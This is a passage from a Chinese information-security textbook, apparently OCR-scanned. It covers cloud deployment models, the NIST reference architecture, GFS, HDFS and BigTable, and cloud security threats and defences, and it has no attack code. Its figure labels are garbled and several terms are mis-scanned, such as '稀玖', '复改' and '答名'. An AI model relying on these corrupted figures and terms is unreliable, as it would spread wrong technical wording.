某 个 第 三 方 负责 管理 ,可 以 是 场 内 服务 (on-premises) ,也 可 以 是 场 外 服务 (off-premises)。 

(3) 社区 云 (Community Cloud) : 云 基础 设施 由 若干 个 组 织 分 享 ,以 支持 某 个 特定 的 
社区 。 社 区 是 指 有 共同 诉求 和 追求 的 团体 ,如 使 命 .安全 要 求 、 政 策 或 合 规 性 考虑 等 。 和 
私有 云 类 似 , 社 区 云 可 以 是 该 组 织 或 某 个 第 三 方 负责 管理 ,可 以 是 场 内 服务 ,也 可 以 是 场 
外 服务 。 

(4) 混合 云 (Hybird Cloud) : 云 基 础 设施 由 两 个 或 多 个 云 ( 私 有 云 .社区 云 或 公有 云 ) 
组 成 ,独立 存在 ,但 是 通过 标准 的 或 私有 的 技术 绑 定 在 一 起 ,这些 技术 可 促成 数据 和 应 用 
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的 可 移植 性 ,如 用 于 云 之 间 负 载 分 担 的 cloud bursting 技术 。 


1132 云 计 算 体系 架构 


这 里 介绍 NIST 给 出 的 云 计 算 参 考 架 构 , 如 图 11-5 所 示 。 该 架构 给 出 了 云 计 算 中 的 
所 涉及 的 主要 角色 ,活动 和 功能 。 通 过 该 图 ,能 促进 用 户 更 好 地 理解 云 计算 中 的 需求 .使 


用 、 特 点 和 标准 等 方面 的 内 容 。 
云 提供 商 (Cloud Provider) 云 代理 商 
的 (Cloud Broker) 
云 消费 者 (Service Orchestration) (Cloud Service Management) 
(Cloud Consumer) 
服务 层 (Service Layer) 
SaaS (Service Intermediation) 
业务 支持 
Paas (Business Support) 
云 审计 员 TS 安 | | 隐 
(Cloud Auditor) 雪 如 a 
各 
资源 抽象 和 控制 层 供应 /配置 号 | | 芭 (Service Aggregation) 
安全 审计 ， (Resource Abstraction and (Provisioning/ 号 | | 总 
(Security AudiD Control Layer) Configuration) 三 ||= 
ne 物理 资源 层 
| 隐私 影响 审计 (Physical Resource Layen 
《Privacy Impact Audit) 可 移植 吝 操 作 服务 仲 夫 
硬件 (Hardware) (Portability/ (Service Arbitrage) 
性 能 审计 - a Interoperability) 
(Performance Audil) 设施 (Facility) 


云 承载 商 (Cloud Carrier) 


图 11-5 ”NIST 的 云 计算 参考 架构 


如 图 11-5 所 示 , NIST 的 云 计 算 参 考 架构 中 的 主要 角色 包括 : 云 消费 者 、 云 提供 商 、 
云 审计 员 ` 云 代理 商 和 云 承载 商 。 云 消费 者 直接 从 云 提供 商 或 通过 云 代理 商 请 求 云 服务 
云 承载 商 为 云 提供 商 或 云 代理 商 到 云 消费 者 的 连接 和 传输 服务 ; 云 审计 员 主 要 完成 对 云 
服务 实现 的 功能 进行 操作 和 安全 性 隐私 保护 、 性 能 等 方面 的 评估 。 

该 架构 给 出 了 云 计算 中 的 主要 活动 和 功能 有 : 服务 部 署 、 服 务 编排 、 云 服务 管理 、 安 
全 和 隐私 。 具 体 而 言 , 服 务 部 署 是 选择 部 署 模式 ,具体 的 已 在 上 节 中 进行 了 介绍 ;服务 编 
排 是 为 了 支撑 云 提供 商 对 计算 资源 的 安排 ,协同 和 管理 等 行为 ,对 系统 组 件 进 行 的 组 合 ， 
使 其 能 为 云 消费 者 提供 服务 ; 云 服务 管理 包括 所 有 和 服务 相关 的 、 服 务 管理 和 操作 所 必需 
的 功能 ,这 些 服务 都 是 云 消 费 者 所 需 的 或 向 其 推荐 的 ;安全 除了 云 提 供 商 外 ,也 涉及 其 他 
的 参与 者 ,如 云 消费 者 等 ;隐私 主要 强调 云 提 供 商 应 保护 个 人 信息 和 个 人 识别 信息 ,包括 
对 这 些 信 息 进 行 安全 的 适当 的 、 一 致 的 收集 \ 处 理 ` 通 信 、 使 用 和 丢弃 。 
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当前 , 云 计 算 中 的 数据 呈现 出 海量 性 , 异 构 型 , 非 确定 性 .异地 备份 等 特点 ,因此 ,需要 
采用 有 效 的 数据 管理 技术 对 海量 数据 和 信息 分 析 和 处 理 , 从 而 构建 高 可 用 和 可 扩展 的 分 
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布 式 数据 存储 系统 。 目 前 , 云 计算 系统 中 常用 的 数据 文件 存储 系统 有 : Google 的 GFS 
(Google File System) 和 Hadoop 开发 的 GFS 的 开源 实现 HDFS( Hadoop Distributed 
File System) ;常用 的 数据 管理 技术 有 : Google 的 BigTable 数据 管理 技术 和 Hadoop 开 
发 的 开源 数据 管理 模块 HBase。 

1. GFS 

GFS 是 一 个 管理 大 型 分 布 式 数据 密集 型 计算 的 可 扩展 的 分 布 式 文件 系统 ,通过 使 用 
廉价 的 商用 硬件 搭建 系统 并 向 大 量 用 户 提供 容错 的 高 性 能 的 服务 。GFS 将 系统 的 结 点 
分 为 三 类 : 客户 端 (Client) 、 主 服务 器 (Master Server) 和 数据 块 服务 器 (Chunk Server)， 
具体 如 图 11-6 所 示 。 


应 用 程序 en GFS 主 服务 器 /foo/bar 
ER 文件 命名 空间 /| shunk 2ef0 | 


[一 / 


(Chunk 句 栖 
Chunk 位 置 ) 4 i 
Ed mm 标注 : 
一 -一 数据 信息 


向 数据 块 服务 器 发 出 指令 一 一 控制 信息 
(Chunk 句 柄 , 字 节 范围 ) 数据 块 服务 器 状态 
GFS 数 据 块 服务 器 GFS 数 据 块 服务 器 
Chunk 数 据 Linux 文 件 系统 | tinux 文 件 系统 


图 11-6 ”GEFS 系统 结构 


GFS 主 服 务 器 管理 所 有 的 文件 系统 元 数据 ,包括 名 字 空 间 、 访 问 控 制 信息 、 文 件 和 
Chunk 的 映射 信息 ,以 及 当前 Chunk 的 位 置信 息 。 此 外 , 主 服务 器 还 管理 着 系统 范围 内 
的 活动 ,如 Chunk 租用 管理 .孤儿 Chunk 的 回收 以 及 Chunk 在 数据 块 服务 器 之 间 的 迁 
移 。GFS 存储 的 文件 被 分 割 为 固定 大 小 的 Chunk ,在 Chunk 创建 的 时 候 , 主 服务 器 会 给 
每 个 Chunk 分 配 一 个 不 变 的 、 全 球 唯 一 的 64 位 的 Chunk 标识 。 为 了 提高 数据 的 可 靠 性 。 
每 份 数据 在 系统 中 保存 3 个 以 上 备份 。 

客户 端 在 访问 GFS 时 ,首先 访问 主 服务 器 ,获取 将 要 与 之 进行 交互 的 数据 块 服务 器 
信息 ,然后 直接 访问 这 些 数据 块 服务 器 完成 数据 存 取 。GEFS 的 这 种 设计 方法 实现 了 控制 
流 和 数据 流 的 分 离 。 客 户 端 与 主 服务 器 之 间 只 有 控制 流 ,而 无 数据 流 ,这 样 就 极 大 地 降低 
了 主 服务 器 的 负载 ,使 之 不 成 为 系统 性 能 的 一 个 瓶颈 。 客 户 端 与 数据 块 服务 器 之 间 直 接 
传输 数据 流 ,同时 由 于 文件 被 分 成 多 个 Chunk 进行 分 布 式 存储 ,客户 端 可 以 同时 访问 多 
个 数据 块 服务 器 ,从 而 使 得 整个 系统 的 1/O 高 度 并 行 ,系统 整体 性 能 得 到 提高 。 

2. HDFS 

HDFS 的 设计 思想 参考 了 Google 的 GFS 文件 系统 ,开发 的 专门 针对 廉价 硬件 设计 
的 分 布 式 文件 系统 ,在 软件 层 内 置 数据 容错 能 力 , 可 应 用 于 云 存 储 系 统 的 创建 开发 ,其 体 
系 结构 如 图 11-7 所 示 。 


Metadata(Name,replicas,…) : 
元 数据 操作 NO 四 /home/foo/data,3 
Client 


数据 块 操作 
| 
| 
DataNode DataNode 复制 -| DataNode DataNode 
DataNode DataNode 机 架 2 
机 架 1 
写 


图 11-7 HDFS 体系 结构 


HDFS 采用 主 从 (Master/Slave) 式 架构 ,包含 三 个 重要 的 角色 : NameNode、 
DataNode 和 Client。Client 是 需要 获取 分 布 式 文件 系统 文件 的 应 用 程序 。 

NameNode 作为 中 心服 务 器 ,是 HDFS 中 的 管理 者 ,主要 负责 管理 文件 系统 中 的 命 
名 空间 和 特定 DataNode 的 映射 ,同时 管理 用 户 对 文件 进行 打开 、 关 闭 、 重 命名 文件 等 访 
问 操作 。 在 NameNode 上 ,文件 系统 的 Metadata 存储 于 内 存 中 ,Metadata 中 包含 了 文件 
信息 .文件 对 应 的 文件 块 的 信息 和 文件 块 在 DataNode 中 的 信息 等 。 

DataNode 用 来 存储 数据 。 在 HDFS 中 ,需要 将 存储 的 文件 分 成 一 个 或 多 个 数据 库 ， 
存储 在 多 个 DataNode 上 。DataNode 是 保存 文件 数据 的 基本 单元 ,文件 的 数据 块 就 存储 
于 DataNode 的 本 地 文件 系统 中 。DataNode 同时 保存 数据 块 的 元 数据 ,并 将 所 存储 的 数 
据 块 信息 周期 性 地 发 给 NameNode。DataNode 接收 并 处 理 来 自分 布 式 文件 系统 Client 
的 读 写 请 求 , 并 在 NameNode 的 统一 调度 下 创建 .删除 和 复制 数据 块 。 


1134 云 数据 管理 技术 


当前 ,常见 的 云 数 据 管 理 技术 有 Google BigTable, Hadoop 的 HBase 等 。 这 里 以 
BigTable 为 例 进行 简单 的 介绍 。BigTable 是 建立 在 GFS、Scheduler、LockService 和 
MapReduce 之 上 的 一 个 大 型 的 分 布 式 数据 库 , 它 将 所 有 数据 都 作为 对 象 来 处 理 , 形 成 了 
一 个 巨大 的 表格 ,用 来 管理 结构 化 数据 。Google 对 BigTable 的 定义 为 : BigTable 是 一 种 
为 了 管理 结构 化 数据 而 设计 的 分 布 式 存储 系统 ,其 被 设计 成 能 够 可 靠 地 处 理 PB 的 数据 
并 能 部 署 在 上 千 台 机 器 上 。 

BigTable 的 数据 模型 是 一 个 稀 玖 的 、 分 布 式 的 、 持 续 的 多 维度 排序 Map,Map 由 key 
和 value 组 成 ,其 通过 行 关 键 字 、 列 关键 字 和 时 间 戳 实现 数据 检索 功能 ,因而 其 存储 结构 


可 表示 为 : (row: string,column: string,time: int64) 一 string。 
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BigTable 是 在 Google 的 其 他 基础 设施 之 上 构建 的 ,其 包括 3 个 主要 的 组 件 : 一 个 主 
服务 器 、 多 个 子 表 服务 器 和 链接 到 客户 程序 中 的 库 。 主 服务 器 主要 负责 : 管理 元 数据 并 
处 理 来 自 客户 端 关于 元 数据 的 请 求 ; 为 子 表 服 务 器 分 配 表 ;检查 新 加 入 的 或 过 期 失效 的 子 
表 服 务 器 ;对 子 表 服 务 器 进行 负载 均衡 等 。 子 表 服 务 器 主要 用 于 存储 数据 并 管理 子 表 , 每 
个 子 表 服 务 器 都 管理 一 个 由 上 千 个 表 组 成 的 表 的 集合 ,并 负责 处 理子 表 的 读 写 操作 和 当 
表 数 量 过 大 时 对 其 进行 的 分 割 操作 。 由 于 客户 端 读 取 的 数据 都 不 经 过 主 服 务 器 , 即 客户 
程序 不 必 通 过 主 服 务 器 获取 表 的 位 置信 息 而 直接 与 子 表 服务 器 进行 读 写 操作 ,因而 大 多 
数 客户 程序 完全 不 需要 和 主 服 务 器 通信 ,从 而 有 效 降低 了 主 服务 器 的 负载 。 


11.4 云 计 算 安 全 


信息 安全 管理 是 一 项 重要 的 活动 , 它 致力 于 控制 信息 的 供应 并 防止 未 经 授权 的 使 用 。 
安全 措施 的 目的 是 要 保护 数据 的 价值 ,这 种 价值 取决 于 机 密 性 、 完 整 性 和 可 用 性 三 个 方 
面 。 根 据 云 数据 的 部 署 特点 ,可 以 看 到 云 数 据 具有 高 度 可 用 性 、 数 据 元 余 性 、 数 据 保密 性 
等 特性 ,而 且 这 些 特性 都 与 信息 安全 中 的 保密 性 和 可 靠 性 十 分 相关 。 因 此 ,为 保证 云 数据 
的 安全 问题 ,就 必须 要 妥善 地 解决 云 计算 平台 的 安全 问题 ,以 达到 信息 安全 的 五 个 基本 要 
素 的 要 求 , 即 实现 云 计 算 平台 的 可 用 性 、 可 控 性 、 完 整 性 \ 保 密 性 和 不 可 抵赖 性 。 
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云 计算 作为 一 种 基于 互联 网 的 计算 方式 ,用 户 数据 的 隐私 保护 问题 显得 尤其 突出 。 
在 云 计 算 中 ,由 于 用 户 不 仅 数据 完全 存储 在 云端 ,而 且 计 算 过 程 也 全 部 在 云端 进行 ,因此 
导致 了 云 计 算 对 于 用 户 数据 隐私 保护 比 传统 的 Web 应 用 有 着 更 为 严峻 的 形势 和 更 为 严 
格 的 要 求 。 例 如 : 由 于 用 户 的 数据 存在 大 量 的 商业 利益 ,许多 黑客 以 此 为 攻击 目标 ,在 获 
得 用 户 的 数据 后 将 其 倒卖 获得 利益 ; 云 计算 服务 商 也 往往 使 用 数据 挖掘 等 技术 手段 ,对 用 
户 的 数据 进行 统计 挖掘 ,获取 用 户 的 行为 数据 ;另外 , 云 服务 商 中 的 工作 人 员 由 于 利益 或 
者 其 他 原因 ,也 常常 会 对 存储 在 云端 的 数据 进行 侵犯 。 而 云 计 算 的 通用 性 、 虚 拟 性 、 共 享 
性 等 特点 ,又 导致 了 传统 系统 中 的 隐私 保护 技术 往往 无 法 使 用 在 云 数据 中 。 由 此 可 见 , 隐 
私 保护 问题 已 经 成 为 阻碍 云 计算 发 展 的 最 主要 问题 之 一 ,不 解决 云 数据 的 隐私 保护 问题 ， 
云 计算 的 广泛 推广 与 应 用 将 会 受到 很 大 阻碍 。 

在 云 计算 环境 下 ,用 户 将 他 们 的 数据 迁移 到 云 计算 平台 后 ,数据 和 信息 管理 流程 将 对 
这 些 用 户 不 再 透明 ,他 们 将 不 再 知道 自己 的 数据 存储 在 哪里 、 被 怎么 存储 的 、 谁 在 处 理 . 有 
没有 备份 等 信息 。 这 个 现象 同时 也 是 云 计算 系统 中 的 诸多 安全 挑战 的 最 主要 根源 。 而 
且 , 建 立 云 计算 服务 提供 商 和 用 户 之 间 的 信任 需要 相当 长 的 一 段 时 间 , 它 需要 云 服务 产业 
链 各 个 环节 的 企业 和 组 织 共 同 努 力 ,当然 ,有 效 地 解决 上 述 问题 和 挑战 也 是 必 不 可 少 的 。 

另外 , 随 着 云 计 算 规 模 的 不 断 扩 大 , 越 来 越 多 具有 不 同属 性 \ 不 同 权限 的 用 户 开始 使 
用 云 计 算 。 正 因为 如 此 ,数据 资源 的 安全 共享 也 变 得 越 来 越 困 难 。 面 对 众多 不 同属 性 的 
使 用 用 户 , 如 何在 云 计算 中 实现 数据 资源 的 安全 共享 也 成 为 一 大 难题 。 在 云 计算 中 ,不 同 
权限 的 用 户 在 共享 某 一 数据 资源 时 ,因为 用 户 的 权限 的 不 同 , 它 所 得 到 此 数据 资源 的 内 容 


信息 安全 导论 


也 不 同 。 但 是 ,传统 的 安全 机 制 在 云 计算 中 难以 保证 数据 资源 的 这 种 安全 共享 ,因此 , 基 
于 云 计 算 的 安全 共享 机 制 也 成 为 研究 的 一 大 热点 。 


1142 云 计算 安全 威胁 


云 计算 给 互联 网 带 来 颠覆 性 的 变化 ,但 同时 引发 了 新 的 安全 问题 。 下 面 将 分 别 从 网 
络 架构 的 角度 和 云 计算 的 数据 风险 角度 介绍 云 计算 数据 资源 所 面 对 的 安全 威胁 。 

1. 云 计算 网 络 层面 的 数据 安全 风险 

因为 私有 云 的 所 有 者 不 需要 与 其 他 组 织 或 企业 共享 任何 资源 ,私有 云 是 企业 或 组 织 
专 有 的 计算 环境 ,因此 ,我们 不 需要 考虑 这 种 新 模式 所 带 来 的 新 漏洞 或 者 特定 拓扑 结构 的 
危险 变化 。 所 以 这 里 主要 讨论 云 计算 模式 给 公有 云 带 来 的 数据 安全 威胁 ,主要 包括 以 下 
四 个 方面 : 

(1) 确保 服务 提供 商 传输 数据 的 保密 性 及 完整 性 。 由 于 公有 云 需要 对 外 部 用 户 提供 
相关 资源 和 开发 所 需 服务 ,那么 公有 云 中 的 数据 资源 会 面 对 来 自 网 络 外 部 的 访问 。2008 
年 12 月 的 亚马逊 Web 服务 漏洞 是 第 一 个 该 方面 的 安全 威胁 。 

另外 ,在 云 计算 系统 中 ,计算 结 点 之 间 的 互联 互通 往往 会 跨越 非 安 全 的 公共 网 络 , 因 
此 在 数据 传输 过 程 中 面临 着 窃听 、 复 改 、 损 毁 等 各 种 风险 。 从 原理 上 说 , 若 要 保证 数据 传 
输 的 安全 则 需要 保证 在 发 包 端 , 收 包 端 和 包 传输 全 过 程 三 方面 的 安全 。 对 于 发 包 和 收 包 
的 终端 来 说 ,可 以 通过 基于 终端 的 安全 措施 来 保护 数据 传输 在 发 送 和 接收 过 程 中 的 安全 
性 ,如 安全 输入 输出 内存 屏 项 ,存储 密封 等 。 云 计算 系统 中 结 点 之 间 的 安全 数据 传输 可 
以 通过 加 密 隧 道 技术 保证 数据 传输 的 机 密 性 ,通过 数字 摘要 数字 证 书 和 数字 时 间 标 签 来 
保证 数据 的 完整 性 和 不 可 算 改 性 。 

(2) 确保 服务 提供 商 对 所 有 的 资源 都 提供 适当 的 访问 控制 ,包括 审计 、 认 证 和 授权 。 
由 于 部 分 资源 (甚至 全 部 资源 ) 暴 露 在 公有 云 中 ,对 云 计 算 服 务 提供 商 的 审计 、 监 控 变 得 相 
当 困难 。 同 时 ,数据 在 公有 云 中 会 接受 所 有 用 户 的 访问 申请 ,如 果 用 户 访问 到 不 属于 自己 
的 数据 就 会 泄露 别人 的 隐私 ,因此 ,服务 提供 商 需要 对 数据 资源 进行 适当 的 访问 控制 ,每 
个 用 户 只 能 访问 到 自己 拥有 的 数据 ,而 不 能 跨 用 户 访问 。 

(3) 确保 云 计算 中 的 公有 云 资源 具备 可 用 性 。 众 多 的 用 户 数 据 和 资源 被 公开 在 公有 
云 上 ,如 何 保证 所 有 合法 用 户 能 正常 访问 服务 提供 商 的 数据 资源 成 为 云 计算 安全 的 关注 
点 之 一 。 拒 绝 服务 攻击 (DoS) 和 分 布 式 服务 攻击 (DDoS) 就 是 两 种 严重 破坏 资源 可 用 性 
的 网 络 攻击 。 

(4) 域 管理 来 代替 现 有 的 网 络 层面 模型 。 随 着 云 计 算 的 发 展 ,传统 网 络 区 域 的 概念 
逐渐 被 取代 , 云 计 算 中 的 基础 设施 即 服务 (IaaS) 和 平台 即 服务 (PaaS) 将 不 再 按照 传统 网 
络 层 来 进行 划分 。 域 成 为 云 计算 网 络 管理 的 一 个 重要 措施 。 域 具有 排他 性 ,只 允许 特定 
角色 访问 该 指定 的 区 域 。 同 理 , 域 管理 下 的 数据 根据 其 自身 所 处 位 置 的 不 同 只 能 访问 特 
定 层面 的 数据 。 包 括 建立 在 IssS 和 PaaS 基础 上 的 SaaS, 都 具备 上 述 域 管理 的 特点 。 

因此 ,传统 意义 上 的 网 络 层 逐渐 通过 云 计 算 环 境 中 的 安全 域 进行 逻辑 隔离 。 但 是 与 
传统 隔离 不 同 ,不 同 层 的 系统 在 主机 层面 上 不 一 定 是 物理 隔离 的 ,公有 云 只 是 针对 不 同 的 
系统 提供 了 逻辑 隔离 。 
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2. 云 计算 主机 层面 的 数据 安全 威胁 


云 计算 中 的 主机 层面 目前 没有 碰 到 专门 的 新 威胁 ,但 是 虚拟 化 技术 的 引入 给 公有 云 
计算 环境 带 来 了 主机 方面 的 安全 风险 。 并 且 , 云 计算 提供 的 服务 模式 需要 服务 提供 商 能 
够 及 时 迅速 的 配置 虚拟 机 资源 ,以 及 实现 实时 的 动态 迁移 ,因此 ,及 时 更 新 主机 的 漏洞 补 
丁 也 开始 变 得 困难 。 

此 外 , 云 计 算 资源 包括 了 成 千 上 万 的 主机 ,包括 虚拟 机 和 硬件 服务 器 ,并 且 这 些 主机 
在 同一 个 云 计算 环境 中 会 使 用 相同 的 系统 配置 ,这 意味 着 云 计算 中 存在 “高 速 攻击 ”的 风 
险 , 攻 破 主机 系统 的 风险 被 放大 化 。 

(1) SaaS 和 PaaS 的 主机 安全 。 黑 客 容易 利用 云 计算 平台 中 的 主机 、 操 作 系 统 信息 
来 和 人 侵 云 计算 服务 提供 商 的 云 计 算 平 台 。 但 是 由 于 数据 资源 共享 机 制 ,IaaS 和 PaaS 中 
的 用 户 对 主机 安全 变 得 不 敏感 ,大 多 数 的 主机 安全 任务 仍 由 云 计算 服务 提供 商 来 承担 。 

为 了 防止 主机 服务 器 相关 信息 的 泄露 , 云 计算 服务 提供 商 在 云 计 算 平台 中 采用 逻辑 
上 的 抽象 分 层 技术 来 加 强 对 云 计算 用 户 的 管理 。 但 SaaS 和 PaaS 有 一 些 明显 的 区 别 ， 
SaaS 用 户 不 能 访问 到 主机 系统 的 任何 信息 ,实现 了 完全 的 逻辑 隔离 ;然而 ,PaaSs 的 用 户 
可 以 通过 服务 提供 商 开 放 的 PaaS 平台 接口 访问 到 部 分 关于 服务 器 的 信息 。 

总 之 ,SaaS 和 PaaS 的 用 户 和 服务 提供 商 的 合作 者 需要 做 好 对 云 计算 平台 的 安全 审 
核 ,以 确保 主机 服务 器 的 安全 。 

(2) IaaS 的 主机 安全 。 为 了 实现 云 计算 数据 资源 的 共享 ,虚拟 化 技术 是 一 个 至 关 重 
要 的 因素 ,这 方面 的 技术 包括 Vmware 和 Xen 等 。 所 以 虚拟 化 技术 的 安全 也 是 IaaS 的 安 
全 因素 之 一 。 

从 云 计 算 平 台 的 角度 来 看 , 云 计算 系统 最 基本 的 单元 就 是 虚拟 机 。 当 一 个 数据 文件 
初次 存储 到 云 计 算 系 统 中 时 , 它 会 被 分 割 成 若干 个 碎片 并 存储 在 不 同 的 虚拟 机 上 ,并 在 各 
个 虚拟 机 上 面 并 行 地 完成 对 文件 碎片 的 操作 。 这 个 文件 分 割 、 存 储 和 计算 管理 的 全 流程 
都 是 由 云 计算 平台 来 负责 的 。 来 自 不 同 公司 的 重要 数据 和 文件 可 能 会 被 存储 在 同一 个 虚 
拟 机 上 ,因此 数据 隔离 和 数据 保护 就 显得 非常 重要 了 。 虚 拟 机 本 身 往往 会 附带 一 系列 的 
数据 管理 系统 ,可 以 实现 一 定 的 数据 加 密 、 数 据 访 问 控制 和 数据 隔离 功能 。 除 此 之 外 , 虚 
拟 防火 墙 可 以 实现 针对 单个 虚拟 机 设置 安全 策略 和 访问 控制 策略 。 最 后 , 云 计算 系统 中 
的 虚拟 机 可 以 被 分 成 若干 组 ,并 配置 不 同 的 安全 级 别 , 如 不 同 的 加 密 强 度 .数据 备份 .数据 
恢复 设置 。 用 户 数据 在 初次 存储 到 云 计 算 系 统 中 的 时 候 , 系 统 可 以 根据 用 户 的 服务 级 别 
将 用 户 数据 存储 在 不 同 的 虚拟 机 组 中 以 实现 服务 分 级 和 安全 保护 分 级 。 

3. 云 计 算 应 用 层面 的 数据 安全 威胁 

应 用 或 软件 安全 是 云 数据 安全 解决 方案 的 关键 ,但 是 大 多 数 安全 方案 没有 充分 考虑 
到 应 用 层面 的 安全 问题 。 应 用 程序 包括 从 单机 单 用 户 到 复杂 的 有 几 百 万 用 户 的 多 用 户 ， 
现 阶 段 的 网 络 应 用 程序 就 是 多 用 户 应 用 程序 的 典型 实例 ,例如 客户 关系 管理 系统 
(CRM) 、Wiki\ 门 户 网 站 论坛 社交 网 络 。 很 多 企业 也 开始 利用 不 同 的 网 络 框 架 (PHP、 
. NET、J2EE、Ruby on Rails、Python) 开 发 和 维护 一 些 网 络 应 用 程序 。 目 前 ,网 络 漏洞 攻 
击 快速 增长 ,多 种 新 的 网 络 渗透 方法 涌现 ,促使 云 计 算 模 式 中 的 网 络 应 用 程序 应 该 受到 严 
格 的 安全 管理 。 
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此 外 , 云 计算 软件 服务 提供 商 通 过 基于 Web 的 “ 瘦 ” 客 户 端 为 用 户 提供 鉴 权 、 登 录 和 
应 用 是 云 计算 软件 服务 商 非 常常 见 的 场景 。 但 由 于 Web 浏览 嚣 本身 的 脆弱 性 ,Web 应 
用 程序 会 很 容易 被 植 人 恶意 代码 而 对 用 户 和 服务 提供 商 带 来 损失 。Web 应 用 程序 防火 
墙 可 以 良好 地 防范 一 些 基于 Web 的 常见 攻击 ,如 跨 网 站 脚本 攻击 、SQL 注入 等 。 
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为 了 给 去 用 户 提供 全 面 的 数据 安全 保护 ,用 户 与 云 之 间 的 双向 身份 认证 ,针对 云 计算 
环境 各 层 服务 的 安全 机 制 等 均 是 必须 要 考虑 的 关键 技术 。 下 面 将 针对 这 几 种 关键 技术 进 
行 详细 的 叙述 和 分 析 。 

1. 以 数据 安全 为 主要 目标 的 云 安全 架构 

目前 ,由 于 数据 安全 和 隐私 保护 是 用 户 最 为 担心 的 云 安全 问题 ,已 有 研究 者 提出 以 数 
据 安全 保护 为 主要 目标 的 云 安全 架构 。 

一 种 数据 安全 保护 机 制 架构 是 DSLC(Data Security Life Cycle) ,需要 管理 策略 、 关 
键 技术 ,监控 机 制 来 共同 保障 。 该 架构 对 云 中 数据 进行 保护 的 思路 分 为 三 个 步骤 : 第 一 ， 
获得 云 中 数据 的 存储 、 传 输 、 处 理 的 相关 信息 ,这样 做 是 由 于 数据 在 不 同 云 服务 中 的 表现 
形式 有 所 不 同 ;第 二 ,建立 数据 安全 生命 周期 ,包括 6 个 阶段 : 创建 ,存储 、 使 用 、 共 享 、 归 
档 和 销毁 ;第 三 ,对 数据 安全 生命 周期 中 的 每 个 阶段 均 明 确 数据 安全 保护 机 制 , 将 行为 实 
施 者 (可 以 是 用 户 、 用 户 、 系 统 / 进 行 等 ) 对 数据 的 操作 定义 为 functions, 而 安全 机 制 则 定 
义 为 controls ,将 所 有 可 能 的 行为 限制 在 允许 的 行为 范围 内 。DSLC 的 局 限 性 是 与 云 计 算 
的 体系 结构 联系 不 够 紧密 ,安全 机 制 针 对 性 不 强 。 

2. 云 计算 中 的 身份 认证 技术 

在 云 计 算 中 ,用 户 可 能 使 用 不 同 云 服务 商 提 供 的 服务 ,从 而 拥有 不 同 的 标识 符 ,很 容 
易 造 成 混淆 与 遗忘 。 因 此 ,采用 联合 身份 认证 技术 实现 跨 云 的 服务 访问 ,要 求 在 服务 访问 
过 程 中 能 够 协调 各 个 云 之 间 的 认证 机 制 。 公 钥 基 础 设施 PKI 能 根据 特定 人 员 或 具有 相 
同安 全 需求 的 特定 应 用 提供 安全 服务 ,包括 数据 加 密 、 数 字 答 名、 身份 识别 以 及 所 必需 的 
密 钥 的 证 书 管理 等 。 因 此 ,基于 PKI 的 联合 身份 认证 技术 被 广泛 用 于 云 中 。 

虽然 PKI 能 够 使 得 云 服务 提供 者 方便 地 验证 用 户 的 证 书 , 但 面临 EE 大 的 用 户 群 。 由 
于 用 户 所 归属 的 信任 域 众多 ,用 户 和 服务 商 的 信任 关系 也 在 动态 变换 ,PKI 的 效率 ,证 书 
的 撤销 等 问题 ,将 会 使 PKI 系统 设计 和 实现 的 复杂 度 迅 速 增 大 。 为 了 降低 基于 证 书 的 
PKI 的 实现 复杂 度 , 基 于 身份 的 密码 学 (Identity-Based Cryptography,IBC) 被 应 用 到 云 计 
算 环 境 下 的 用 户 认证 ,这 种 方案 不 使 用 证 书 , 用 户 的 公 钥 直接 从 用 户 的 身份 信息 提取 。 

3. 静态 存储 数据 的 保护 

云 提供 的 存储 服务 ,也 成 为 数据 即 服务 DaaS ,是 云 计 算 中 基础 设施 即 服务 IaaS 的 一 
种 重要 形式 。 借 助 于 虚拟 化 和 分 布 式 计算 与 存储 技术 , 云 存储 将 廉价 的 存储 介质 整合 为 
大 的 存储 资源 池 , 并 向 用 户 屏蔽 硬件 配置 .数据 分 配 、 容 灾 备份 等 细节 。 用 户 租用 存储 资 
源 放置 自己 的 数据 ,并 且 可 以 远程 进行 访问 。 云 存储 中 的 数据 是 静态 数据 ,数据 的 机 密 
性 ,可 取 回 性 、 完 整 性 .隐私 性 、 安 全 问 责 等 均 是 用 户 关注 的 安全 问题 。 

对 于 数据 保密 性 问题 ,一 种 直观 的 方式 是 由 用 户 对 数据 进行 加 密 。 由 于 加 密 数据 检 
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索 无 法 用 传统 的 基于 明文 关键 字 检索 ,因此 , 密 文 检索 成 为 一 个 研究 热点 。 基 于 安全 索引 
的 方法 通过 为 密 文 关键 词 建立 安全 索引 ,检索 索引 查询 关键 词 是 否 存在 ;基于 密 文 扫描 的 
方法 对 密 文中 每 个 单词 进行 比 对 ,确认 关键 词 的 存在 ,并 统计 出 现 次 数 。 另 一 种 保证 机 密 
性 的 方法 是 通过 访问 控制 机 制 来 实现 。 由 于 云 服务 商 拥有 管理 员 权 限 ,用 户 无 法 信赖 服 
务 商 诚实 地 实施 用 户 定义 的 访问 控制 策略 ,传统 的 访问 控制 类 手段 无 法 解决 这 一 问题 , 因 
此 ,基于 密码 学 的 访问 控制 策略 开始 出 现 , 如 : 将 用 户 密 钥 或 密 文 嵌入 访问 控制 树 ,访问 
者 只 有 具有 树 结 点 所 代表 的 所 有 属性 ,才能 获得 访问 权限 。 

针对 数据 丢失 问题 , 云 服 务 商会 由 于 商业 利益 ,竭力 隐瞒 数据 丢失 事故 ,因此 ,对 于 用 
户 来 说 ,希望 能 够 验证 其 数据 的 完整 性 。 如 果 将 数据 全 部 下 载 来 进行 验证 ,通信 开销 会 比 
较 大 ,因此 ,利用 某 种 形式 的 挑战 -应 答 协议 被 应 用 到 完整 性 验证 算法 中 ,使 云 用户 在 取 回 
很 少数 据 的 情况 下 ,通过 基于 伪 随 机 抽样 的 概率 性 检查 方法 ,以 高 置信 概率 判断 远 端 数据 
是 否 完整 。 

在 数据 隐私 保护 方面 ,用 户 希 望 云 服务 商 除 了 检索 结果 之 外 一 无 所 知 ,不 能 通过 对 用 
户 数据 的 搜集 和 分 析 ,挖掘 出 用 户 隐私 。 常 采用 的 方法 有 -匿名 ,/- 多 样 性 ,差分 隐私 等 。 

4. 动态 数据 的 隔离 保护 

为 了 保护 动态 数据 的 机 密 性 , 密 文 处 理 技术 是 一 种 直接 的 方法 。IBM 研究 院 Gentry 
利用 “理想 格 ” 构 造 隐私 同 态 (privacy homomorphism) 算 法 ,也 称 为 全 同 态 加 密 , 使 人 们 可 
以 充分 地 操作 加 密 状 态 的 数据 ,在 理论 上 取得 了 一 定 突破 。Sadeghi 将 同 态 加 密 与 可 信 
计算 技术 相 结 合 , 为 云 用户 提供 可 信 的 云 服务 。 但 是 ,上 述 方案 虽然 实现 了 理论 上 的 突 
